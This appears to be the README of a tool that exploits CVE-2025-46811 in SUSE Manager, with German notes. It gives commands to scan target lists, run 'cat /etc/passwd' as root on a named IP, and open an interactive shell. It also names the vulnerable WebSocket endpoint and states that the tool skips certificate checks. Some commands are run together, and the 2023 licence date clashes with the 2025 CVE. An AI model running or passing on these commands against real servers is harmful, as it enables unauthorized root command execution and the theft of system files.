
CVE-2025-46811
git clone https://github.com/yourusername/suse-manager-exploit.git
cd suse-manager-exploit
pip install -r requirements.txtpython3 exploit.py scan -i targets.txt -o vulnerable.txt --debug# Single command python3 exploit.py exploit 10.0.0.5 -c "cat /etc/passwd"Interactive shell
python3 exploit.py exploit vulnerable.com --debug
Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Bildungszwecke bestimmt. Die Verwendung gegen Systeme ohne vorherige Genehmigung ist illegal.
MIT - Copyright (c) 2023
| Komponente | Beschreibung |
|---|---|
| WebSocket-Endpunkt | /rhn/websocket/minion/remote-commands |
| Schwachstellenprüfung | Überprüft die Ausführung von Root-Befehlen über id |
| SSL-Behandlung | Umgeht die Zertifikatsprüfung |